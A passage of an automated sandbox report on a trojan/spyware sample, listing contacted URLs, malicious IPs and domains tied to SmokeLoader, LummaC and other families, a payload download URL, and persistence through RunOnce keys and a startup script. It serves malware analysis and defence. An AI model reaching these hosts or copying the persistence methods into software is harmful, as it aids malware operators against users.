https://nuget.org/nuget.exe	powershell.exe, 0000000F.00000002.4506439051.0000022A4534E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A36B30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ssl.com/repository0	6E8A.exe.2.dr	false	URL Reputation: safe	unknown
http://ocsps.ssl.com0_	6E8A.exe.2.dr	false	Avira URL Cloud: safe	unknown
https://callosallsaospz.shop/b	BitLockerToGo.exe, 0000000E.00000003.2999741384.000000000084C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://callosallsaospz.shop/apioro	BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://callosallsaospz.shop/m	BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000002.00000000.2083945040.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/h	BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://callosallsaospz.shop/i	BitLockerToGo.exe, 0000000E.00000003.3054586078.000000000088E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3043948078.000000000088E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035350826.000000000088D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3033291199.000000000088D000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	6E8A.exe, 0000000B.00000002.4476671505.0000021F87821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A351A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://.jpg	7C81.exe, 0000000A.00000002.2959614656.00007FF7D50A3000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe, 0000000A.00000000.2860149231.00007FF7D5094000.00000008.00000001.01000000.00000007.sdmp, 7C81.exe.2.dr	false	Avira URL Cloud: safe	unknown
https://rentry.co	6E8A.exe, 0000000B.00000002.4476671505.0000021F87BB9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oberhumer.com	3530.exe, 3530.exe.2.dr	false	Avira URL Cloud: safe	unknown
https://callosallsaospz.shop/o	BitLockerToGo.exe, 0000000E.00000003.2966295080.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wns.windows.com/)s	explorer.exe, 00000002.00000000.2081714361.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000000.2085955197.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 0000000F.00000002.4506439051.0000022A4534E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A36B30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/D	BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store4.gofile.io	powershell.exe, 0000000F.00000002.4477339135.0000022A367D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.4477339135.0000022A36836000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/apiQbd	BitLockerToGo.exe, 0000000E.00000003.3055164389.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://go.micro	powershell.exe, 0000000F.00000002.4477339135.0000022A35DD2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/apisF	BitLockerToGo.exe, 0000000E.00000002.3107588566.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3104687148.00000000007D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contoso.com/Icon	powershell.exe, 0000000F.00000002.4506439051.0000022A4520C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/apiem	BitLockerToGo.exe, 0000000E.00000003.3104687148.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107867332.0000000000831000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BitLockerToGo.exe, 0000000E.00000003.2984214183.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0	6E8A.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://callosallsaospz.shop///	BitLockerToGo.exe, 0000000E.00000003.3018136549.000000000084D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3000915062.000000000084C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3044151506.000000000084F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3055424185.000000000084E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035776586.000000000084D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://callosallsaospz.shop/apiyy	BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.com	explorer.exe, 00000002.00000000.2081714361.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	BitLockerToGo.exe, 0000000E.00000003.3020206308.0000000004BBA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000F.00000002.4477339135.0000022A353D2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	6E8A.exe.2.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0	6E8A.exe.2.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.2080080282.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	BitLockerToGo.exe, 0000000E.00000003.3018909605.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://rentry.co	6E8A.exe, 0000000B.00000002.4476671505.0000021F87C33000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	BitLockerToGo.exe, 0000000E.00000003.3035559758.000000000082E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/	explorer.exe, 00000002.00000000.2081714361.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 0000000F.00000002.4477339135.0000022A351A1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0	6E8A.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://crl.v	explorer.exe, 00000002.00000000.2078086633.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/	BitLockerToGo.exe, 0000000E.00000003.3018648864.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3073235236.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3055864106.0000000000844000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3023337525.000000000082F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3035559758.0000000000830000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000E.00000003.3018166351.000000000082F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://callosallsaospz.shop/0	BitLockerToGo.exe, 0000000E.00000002.3107914104.0000000000841000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
77.221.157.163	unknown	Russian Federation	30968	INFOBOX-ASInfoboxruAutonomousSystemRU	true
107.173.160.139	unknown	United States	36352	AS-COLOCROSSINGUS	true
107.173.160.137	unknown	United States	36352	AS-COLOCROSSINGUS	true
162.0.235.84	funrecipebooks.com	Canada	22612	NAMECHEAP-NETUS	true
109.172.114.212	unknown	Russian Federation	41691	SUMTEL-AS-RIPEMoscowRussiaRU	true
64.190.113.113	unknown	United States	26646	TRAVELCLICKCORP1US	true
125.7.253.10	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	true
177.222.41.236	unknown	Bolivia	27882	TelefonicaCelulardeBoliviaSABO	true
186.145.236.93	mzxn.ru	Colombia	14080	TelmexColombiaSACO	true
104.26.3.16	rentry.co	United States	13335	CLOUDFLARENETUS	true
167.235.128.153	unknown	United States	3525	ALBERTSONSUS	true
188.114.96.3	callosallsaospz.shop	European Union	13335	CLOUDFLARENETUS	true
185.149.100.242	mussangroup.com	Turkey	209853	VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi	true
31.14.70.245	store4.gofile.io	Virgin Islands (BRITISH)	199483	LINKER-ASFR	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483386
Start date and time:	2024-07-27 07:28:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/15@16/14
EGA Information:	Successful, ratio: 77.8%
HCA Information:	Successful, ratio: 71% Number of executed functions: 61 Number of non-executed functions: 61
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 7C81.exe, PID 5268 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 2136 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:29:23	API Interceptor	415742x Sleep call for process: explorer.exe modified
01:30:34	API Interceptor	8x Sleep call for process: BitLockerToGo.exe modified
01:30:38	API Interceptor	4293x Sleep call for process: powershell.exe modified
07:29:23	Task Scheduler	Run new task: Firefox Default Browser Agent B7A2758D3B996256 path: C:\Users\user\AppData\Roaming\sashibt
07:31:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#7936_8yUscnjrUY C:\Users\user\AppData\Local\Temp\3530.exe
07:31:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#7936_8yUscnjrUY C:\Users\user\AppData\Local\Temp\3530.exe
07:33:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
77.221.157.163	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	77.221.157.163/systemd.exe
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	Nodf3hIUrK.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	y2b1PHwo8d.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
107.173.160.139	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse
	Nodf3hIUrK.exe	Get hash	malicious	SmokeLoader	Browse
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse
107.173.160.137	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	win.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse
	Nodf3hIUrK.exe	Get hash	malicious	SmokeLoader	Browse
	uue9O7WXRA.exe	Get hash	malicious	SmokeLoader	Browse
162.0.235.84	http://libs0.jquery.digital	Get hash	malicious	Unknown	Browse	libs0.jquery.digital/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mussangroup.com	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	185.149.100.242
	file.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	185.149.100.242
	file.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	file.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	file.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	Pi6fnXmVmd.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	file.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	file.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	fvI01ZBE1b.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
rentry.co	allchecker.exe	Get hash	malicious	Python Stealer, CStealer	Browse	172.67.75.40
	QMe7JpPtde.exe	Get hash	malicious	Unknown	Browse	104.26.2.16
	cliente.exe	Get hash	malicious	Unknown	Browse	172.67.75.40
	S982i1J0Uk.msi	Get hash	malicious	Unknown	Browse	104.26.3.16
	cliente.exe	Get hash	malicious	Unknown	Browse	104.26.3.16
	8998BC9FAF52DAB072698E932593819BFD772EE5C0C4519F30ECD55DE363505A.exe	Get hash	malicious	Bdaejec	Browse	104.26.3.16
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	104.26.3.16
	Adobe-GenP.exe	Get hash	malicious	Unknown	Browse	104.26.2.16
	updater.exe	Get hash	malicious	Xmrig	Browse	172.67.75.40
	SecuriteInfo.com.Win32.Evo-gen.6791.6790.exe	Get hash	malicious	Python Stealer, CStealer, Xmrig	Browse	104.26.2.16
funrecipebooks.com	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	162.0.235.84
liernessfornicsa.shop	1lKbb2hF7fYToopfpmEvlyRN.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.213.85
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	172.67.213.85
	1qlzPN3oeX.exe	Get hash	malicious	LummaC	Browse	104.21.77.246
	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.213.85
store4.gofile.io	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	w85VkFOxiD.exe	Get hash	malicious	Python Stealer, CStealer, NiceRAT, Quasar	Browse	31.14.70.245
	9afaXJv52z.exe	Get hash	malicious	Exela Stealer	Browse	31.14.70.245
	NoBackend.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	Microsoft_Teams_SC.ba#.bat	Get hash	malicious	Unknown	Browse	31.14.70.245
	c0PZAXHMCpdh5F1.exe	Get hash	malicious	Clipboard Hijacker, Redline Clipper, Stealerium	Browse	31.14.70.245
	5a7TEjoYQp.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	wins9c8hG6.exe	Get hash	malicious	Raccoon Stealer v2, Xmrig	Browse	31.14.70.245
	GameInject.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	KfpMPicGie.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NAMECHEAP-NETUS	https://f522my.fi79.fdske.com/ec/gAAAAABmpB7T0a5uPS5ojzr4t_T3OUm-FdnelJXDBC1VoV6m2V3L_fPLJYD_I4iovDAQynFwUxenvGcRNh2X00urBe5-4u-rT9GnyUh1X4xs-bp1jFgbdnQWjG990ZIV-3jiRSF6xm2yQVII0IUZNMTwe6xA7L7bXWw_begThms8P6liFgUdG6VQSYwrbqAxhU2UEyqaypup8CoqX1XTXX22SapdlozSl3U2FuKV8U9lz4_YoWYvXaj9erwugsbbIzwuyoMgDRxdh9iJQFak65dYgkq2tGXY1LV-S0k2sDgZf7wEDr63jmpMQO3SzqMfQA3mGK6zccUXpwE0i3r8hj5z4np9jw5lE8Wcp6N7QIvI_qpBMTJqfmuaZZdQ5LOQYKgqx2tl9eUzVwZBUsvbcRUHD4gPhSo47eQGLiImSy0uueaOd9GD5v-xXSggcJV4oiu3m7MRPADdbsVfsrtFilW1dPy_5ezRxo0JN8be1WWGWOeTVzt3fK4=	Get hash	malicious	Unknown	Browse	198.54.126.147
	Aurora.exe	Get hash	malicious	Aurora, Quasar, RedLine, Xmrig	Browse	192.64.119.108
	TNS71092E68UI0.vbe	Get hash	malicious	FormBook	Browse	198.54.117.242
	file.exe	Get hash	malicious	SystemBC	Browse	198.54.120.214
	LisectAVT_2403002A_333.exe	Get hash	malicious	Unknown	Browse	198.54.125.89
	LisectAVT_2403002A_333.exe	Get hash	malicious	Unknown	Browse	198.54.125.89
	LisectAVT_2403002A_87.exe	Get hash	malicious	FormBook	Browse	162.0.236.122
	LisectAVT_2403002A_97.exe	Get hash	malicious	DarkVision Rat	Browse	198.54.126.102
	Quotation.exe	Get hash	malicious	FormBook	Browse	68.65.122.150
	LisectAVT_2403002B_309.exe	Get hash	malicious	Bdaejec, FormBook	Browse	162.0.225.191
INFOBOX-ASInfoboxruAutonomousSystemRU	file.exe	Get hash	malicious	Unknown	Browse	109.120.137.52
	s6K4JjTwtz.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	IrJIw2lsaB.msi	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	ptuNVk3HeK.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	Qnwce6AQX2.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	cLi4FZejpP.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	uf0VrlE1bR.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	v9A2nFGtMJ.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	XaEvV3DPc7.exe	Get hash	malicious	RHADAMANTHYS	Browse	109.120.176.41
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	77.221.157.163
AS-COLOCROSSINGUS	jjjUC5ggb2nQMb1B6SvBkwmT.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	23.94.183.150
	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	104.168.36.68
	172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.3.101.142
	1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.210.214.9
	IFqsFpijFt.rtf	Get hash	malicious	Remcos	Browse	198.46.176.133
	girlfrnd.doc	Get hash	malicious	GuLoader, Remcos	Browse	104.168.45.34
	erthings.doc	Get hash	malicious	Remcos	Browse	192.3.101.142
	girlfrnd.doc	Get hash	malicious	Remcos	Browse	198.46.176.133
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	192.227.225.166
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	192.227.225.166
AS-COLOCROSSINGUS	jjjUC5ggb2nQMb1B6SvBkwmT.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	23.94.183.150
	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	104.168.36.68
	172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.3.101.142
	1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.210.214.9
	IFqsFpijFt.rtf	Get hash	malicious	Remcos	Browse	198.46.176.133
	girlfrnd.doc	Get hash	malicious	GuLoader, Remcos	Browse	104.168.45.34
	erthings.doc	Get hash	malicious	Remcos	Browse	192.3.101.142
	girlfrnd.doc	Get hash	malicious	Remcos	Browse	198.46.176.133
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	192.227.225.166
	PRZELEW BANKOWY.xls	Get hash	malicious	Unknown	Browse	192.227.225.166

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a6c95ef2da5b759f65c60665167952ee	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	win.exe	Get hash	malicious	Unknown	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	win.exe	Get hash	malicious	Unknown	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	file.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	8GJ842Gu9e.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	rs6c8bBX5r.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
	Nodf3hIUrK.exe	Get hash	malicious	SmokeLoader	Browse	107.173.160.139 107.173.160.137 167.235.128.153
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
	SecuriteInfo.com.Adware.DownwareNET.4.25474.32231.exe	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
	engine.ps1	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
	invoker.ps1	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
	tgmes.ps1	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
	x.ps1	Get hash	malicious	Unknown	Browse	104.26.3.16 31.14.70.245
